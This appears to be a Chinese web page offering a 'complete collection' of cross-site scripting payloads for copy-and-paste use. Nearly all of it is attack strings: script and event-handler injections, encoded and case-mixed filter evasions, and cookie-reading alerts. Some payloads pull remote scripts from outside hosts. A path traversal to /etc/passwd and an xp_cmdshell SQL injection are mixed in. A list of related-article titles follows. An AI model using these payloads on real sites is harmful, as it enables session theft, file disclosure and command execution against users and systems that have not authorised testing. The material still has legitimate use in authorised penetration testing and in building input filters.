XSS(跨站脚本攻击) - 常用代码大全:

2020-03-05更新:增加42条xss代码

1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt><svg/onload=alert(1)><script>alert(document.cookie)</script>'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(vulnerable)</script>%3Cscript%3Ealert('XSS')%3C/script%3E<script>alert('XSS')</script><img src="javascript:alert('XSS')">%0a%0a<script>alert(\"Vulnerable\")</script>.jsp%22%3cscript%3ealert(%22xss%22)%3c/script%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html<script>alert('Vulnerable');</script><script>alert('Vulnerable')</script>a.jsp/<script>alert('Vulnerable')</script>a?<script>alert('Vulnerable')</script>"><script>alert('Vulnerable')</script>';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=<IMG src="javascript:alert('XSS');"><IMG src=javascript:alert('XSS')><IMG src=JaVaScRiPt:alert('XSS')><IMG src=JaVaScRiPt:alert("XSS")><IMG src=javascript:alert('XSS')><IMG src=javascript:alert('XSS')><IMG src=javascript:alert('XSS')><IMG src="jav ascript:alert('XSS');"><IMG src="jav ascript:alert('XSS');"><IMG src="jav ascript:alert('XSS');">"<IMG src=java\0script:alert(\"XSS\")>";' > out<IMG src=" javascript:alert('XSS');"><SCRIPT>a=/XSS/alert(a.source)</SCRIPT><BODY BACKGROUND="javascript:alert('XSS')"><BODY ONLOAD=alert('XSS')><IMG DYNSRC="javascript:alert('XSS')"><IMG LOWSRC="javascript:alert('XSS')"><BGSOUND src="javascript:alert('XSS');"><br size="&{alert('XSS')}"><LAYER src="http://xss.ha.ckers.org/a.js"></layer><LINK REL="stylesheet" href="javascript:alert('XSS');"><IMG src='vbscript:msgbox("XSS")'><IMG src="mocha:[code]"><IMG src="livescript:[code]"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><IFRAME src=javascript:alert('XSS')></IFRAME><FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET><TABLE BACKGROUND="javascript:alert('XSS')"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"><DIV STYLE="width: expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE='xss:expre\ssion(alert("XSS"))'><STYLE TYPE="text/javascript">alert('XSS');</STYLE><STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><BASE href="javascript:alert('XSS');//">getURL("javascript:alert('XSS')")a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);<XML src="javascript:alert('XSS');">"> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT><IMG src="javascript:alert('XSS')"<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://xss.ha.ckers.org/a.js></SCRIPT>'"--><IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"><SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT><A href=http://www.gohttp://www.google.com/ogle.com/>link</A><IMG SRC=javascript:alert(‘XSS’)><IMG SRC=# onmouseover=”alert(‘xxs’)”><IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img><img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><IMG SRC=”jav ascript:alert(‘XSS’);”><IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”><IMG SRC=” &#14;  javascript:alert(‘XSS’);”><<SCRIPT>alert(“XSS”);//<</SCRIPT><IMG SRC=”javascript:alert(‘XSS’)”</script><script>alert(‘XSS’);</script><INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”><BODY BACKGROUND=”javascript:alert(‘XSS’)”><svg/onload=alert('XSS')><IMG SRC=’vbscript:msgbox(“XSS”)’><BGSOUND SRC="javascript:alert('XSS');"><BR SIZE="&{alert('XSS')}"><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><XSS STYLE="behavior: url(xss.htc);"><IFRAME SRC="javascript:alert('XSS');"></IFRAME><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><TABLE><TD BACKGROUND="javascript:alert('XSS')"><DIV STYLE="width: expression(alert('XSS'));"><SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT><script>alert(/xss/)</script><svg onload=alert(document.domain)><img src=document.domain onerror=alert(document.domain)><M onmouseover=alert(document.domain)>M<marquee onscroll=alert(document.domain)><a href=javascript:alert(document.domain)>M</a><body onload=alert(document.domain)><details open ontoggle=alert(document.domain)><embed src=javascript:alert(document.domain)><script>alert(1)</script><sCrIpT>alert(1)</sCrIpT><ScRiPt>alert(1)</ScRiPt><sCrIpT>alert(1)</ScRiPt><ScRiPt>alert(1)</sCrIpT><img src=1 onerror=alert(1)><iMg src=1 oNeRrOr=alert(1)><ImG src=1 OnErRoR=alert(1)><img src=1 onerror="alert(&quot;M&quot;)"><marquee onscroll=alert(1)><mArQuEe OnScRoLl=alert(1)><MaRqUeE oNsCrOlL=alert(1)><a href=javascript:/0/,alert(%22M%22)>M</a><a href=javascript:/00/,alert(%22M%22)>M</a><a href=javascript:/000/,alert(%22M%22)>M</a><a href=javascript:/M/,alert(%22M%22)>M</a><base href=javascript:/M/><a href=,alert(1)>M</a><base href=javascript:/M/><iframe src=,alert(1)></iframe></textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>"><img src=x onerror=alert(document.cookie)>.gif<div style="background-image:url(javascript:alert(/xss/))"><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><iframe src=javascript:alert(1)></iframe><iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe><iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe><iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe><iframe src=https://baidu.com width=1366 height=768></iframe><iframe src=javascript:alert(1) width=1366 height=768></iframe<form action=javascript:alert(1)><input type=submit><form><button formaction=javascript:alert(1)>M<form><input formaction=javascript:alert(1) type=submit value=M><form><input formaction=javascript:alert(1) type=image value=M><form><input formaction=javascript:alert(1) type=image src=1><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

XSS(跨站脚本攻击) - 常用代码大全相关推荐

  1. 遭遇 XSS 跨站脚本攻击?稳住,这些方法可保你渡劫 | 附代码、图解

    作者 | 杨秀璋 责编 | 夕颜 出品 | CSDN博客 本文将详细讲解XSS跨站脚本攻击,从原理.示例.危害到三种常见类型(反射型.存储型.DOM型),并结合代码示例进行详细讲解,最后分享了如何预防 ...

  2. [网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)

    这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步.前文分享了Python弱口令攻击.自定义字典生成,并构建了Web目录扫描器:本文将 ...

  3. XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结

    XSS跨站脚本攻击原理与常见的脚本及<XSS跨站脚本攻击剖析与防御>摘录总结 一.XSS跨站脚本攻击的原理 1.什么是XSS跨站脚本 2.跨站脚本攻击产生因素 二.XSS跨站脚本攻击的类别 ...

  4. XSS跨站脚本攻击漏洞(1)

    XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击   全都是前端的  只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很 ...

  5. 使用AntiSamy防范XSS跨站脚本攻击

    0x00 什么是XSS? XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见于web application中的计算机安全漏洞.XSS通过在用户端注入恶意的可运行脚本,若服 ...

  6. 渗透知识-XSS跨站脚本攻击

    XSS跨站脚本攻击:两种情况.一种通过外部输入然后直接在浏览器端触发,即反射型XSS:还有一种则是先把利用代码保存在数据库或文件中,当web程序读取利用代码并输出在页面上时触发漏洞,即存储型XSS.D ...

  7. xss跨站脚本攻击_网络安全xss跨站脚本攻击原理

    以下在未经授权的网站操作均为违法行为 XSS跨站脚本攻击 xss的危害 网络钓鱼,盗取各类账号密码 我们先来看一下下面的案例:先来记住一下下面中的表 我们来做一个转发 上面页面显示已经登录,但是突然页 ...

  8. XSS(跨站脚本攻击)相关内容总结整理

    XSS的攻击相关资料整理 文章目录 XSS的攻击相关资料整理 跨站脚本攻击(XSS) XSS 简介 XSS 危害 XSS 原理 XSS 分类 XSS 防御总结 XSS 问答 参考资料 跨站脚本攻击(X ...

  9. 安全漏洞中的倚天剑——XSS跨站脚本攻击

    one.概念 XSS跨站脚本攻击(Cross-Site Scripting)就是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行,XSS属于被动式的攻击,因为其被动且不好利用, ...

最新文章

  1. 在Spring Boot中实现通用Auth认证的几种方式
  2. 几种优化方法的Matlab实现
  3. 设计模式--建造者(Builder)模式
  4. SQL Server查询所有数据库下模式schema
  5. python getattr_详解 Python 的二元算术运算,为什么说减法只是语法糖?
  6. 爬虫 动态生成useragent的功能 fake-useragent库
  7. java入门第二天课程,Java菜鸟培训第二天
  8. 基于JAVA+SpringMVC+Mybatis+MYSQL的保险业务管理系统
  9. Python中的list/tuple/dict/set数据类型详解
  10. HPE 发布严重的 RCE 0day 漏洞,影响服务器管理软件 SIM,无补丁
  11. iphone 抹除设备是什么意思_环保设备公司什么意思?|危汇网|
  12. 最新全国五级行政区划json文件下载链接 全国最新统计用区划代码和城乡划分代码使用指南
  13. 软件测试怎么测微信朋友圈,面试题:如何测试微信朋友圈(附图)
  14. android wifi 信道,WiFi不稳定经常断?手机WiFi信道小工具【图】_Android资讯_太平洋电脑网...
  15. U盘重装Win10系统视频教程
  16. 百度收录批量查询_如何查看网站是否被收录?
  17. 程序员平时都是木讷的,但是谈到计算机或者程序的时候简直就是天才—兼借题发挥,谈谈语言及工具的选择...
  18. javaScript系列 [06]-javaScript和this
  19. 超微服务器性能,读取性能强劲 超微2U机架F228服务器评测
  20. 鸿蒙的物联网世界之我的一天

热门文章

  1. 进程同步算法实现实验报告Linux,进程同步:实验报告
  2. 修改Navicat Premium 12创建一个用户连接默认显示所有数据库的设置
  3. 鲨纹科技,罗永浩的黑科技还是万金油?
  4. vscode设置删除行快捷键
  5. 村田噪声抑制基础教程-第一章 需要EMI静噪滤波器的原因
  6. 【LOG10】函数使用技巧
  7. 板块模型构建、k点选定及Miller指数对表面分类
  8. Expression: front() called on empty vector
  9. Python 技术篇-用wave库实现音频mp3格式转wav格式,高保真!
  10. volatile如何保证可见性